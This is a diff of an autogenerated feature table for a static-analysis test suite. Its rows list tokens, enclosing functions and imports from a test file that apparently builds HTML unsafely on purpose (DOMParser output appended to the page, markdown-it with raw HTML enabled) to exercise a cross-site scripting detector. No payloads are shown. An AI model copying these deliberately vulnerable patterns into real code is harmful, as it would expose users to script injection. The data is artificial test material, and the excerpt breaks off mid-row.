autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:25:16:33 | cloneNode | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:25:16:33 | cloneNode | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:25:16:33 | cloneNode | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:25:16:33 | cloneNode | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:25:16:33 | cloneNode | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:12 | document | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:12 | document | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:26 | documen ... elector | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:26 | documen ... elector | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | documen ... "#xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | documen ... "#xml") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | documen ... "#xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | documen ... "#xml") | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | documen ... "#xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | exceptional return of documen ... "#xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | exceptional return of documen ... "#xml") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | exceptional return of documen ... "#xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | exceptional return of documen ... "#xml") | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:34 | exceptional return of documen ... "#xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:46 | documen ... ndChild | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:46 | documen ... ndChild | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:46 | documen ... ndChild | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:46 | documen ... ndChild | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:46 | documen ... ndChild | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | documen ... ld(tmp) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | documen ... ld(tmp) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | documen ... ld(tmp) | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | documen ... ld(tmp) | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | documen ... ld(tmp) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | exceptional return of documen ... ld(tmp) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | exceptional return of documen ... ld(tmp) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | exceptional return of documen ... ld(tmp) | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | exceptional return of documen ... ld(tmp) | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:5:17:51 | exceptional return of documen ... ld(tmp) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:14:17:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:14:17:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:14:17:26 | querySelector | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:14:17:26 | querySelector | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:14:17:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:28:17:33 | "#xml" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:28:17:33 | "#xml" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:28:17:33 | "#xml" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22878,6 +151171,11 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:28:17:33 | "#xml" | enclosingFunctionName | xssThroughMoreComplexXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:28:17:33 | "#xml" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:28:17:33 | "#xml" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:36:17:46 | appendChild | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:36:17:46 | appendChild | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:36:17:46 | appendChild | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:36:17:46 | appendChild | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:36:17:46 | appendChild | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:48:17:50 | tmp | CalleeFlexibleAccessPath | document.querySelector().appendChild | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:48:17:50 | tmp | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:48:17:50 | tmp | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22885,6 +151183,31 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:48:17:50 | tmp | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:48:17:50 | tmp | enclosingFunctionName | xssThroughMoreComplexXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:17:48:17:50 | tmp | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:14 | markdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:14 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:14 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:14 | markdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:53 | markdow ... true}) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:53 | markdow ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:53 | markdow ... true}) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:53 | markdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:53 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:7:20:53 | markdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:24 | require | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:24 | require | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:39 | exceptional return of require ... wn-it') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:39 | exceptional return of require ... wn-it') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:39 | exceptional return of require ... wn-it') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:39 | require ... wn-it') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:39 | require ... wn-it') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:39 | require ... wn-it') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:53 | exceptional return of require ... true}) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:53 | exceptional return of require ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:53 | exceptional return of require ... true}) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:53 | require ... true}) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:53 | require ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:18:20:53 | require ... true}) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:26:20:38 | 'markdown-it' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:26:20:38 | 'markdown-it' | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:26:20:38 | 'markdown-it' | calleeImports | | @@ -22897,6 +151220,15 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:41:20:52 | {html: true} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:41:20:52 | {html: true} | contextSurroundingFunctionParameters | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:41:20:52 | {html: true} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:45 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:45 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:45 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:51 | html: true | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:51 | html: true | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:51 | html: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:51 | html: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:51 | html: true | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:42:20:51 | html: true | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:48:20:51 | true | CalleeFlexibleAccessPath | import(!) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:48:20:51 | true | InputAccessPathFromCallee | 0.html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:48:20:51 | true | InputArgumentIndex | 0 | @@ -22905,11 +151237,103 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:48:20:51 | true | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:48:20:51 | true | contextSurroundingFunctionParameters | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:20:48:20:51 | true | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:33 | module. ... arkdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:33 | module. ... arkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:21:33 | module. ... arkdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:24:1 | module. ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:21:1:24:1 | module. ... html;\\n} | contextSurroundingFunctionParameters | | +| 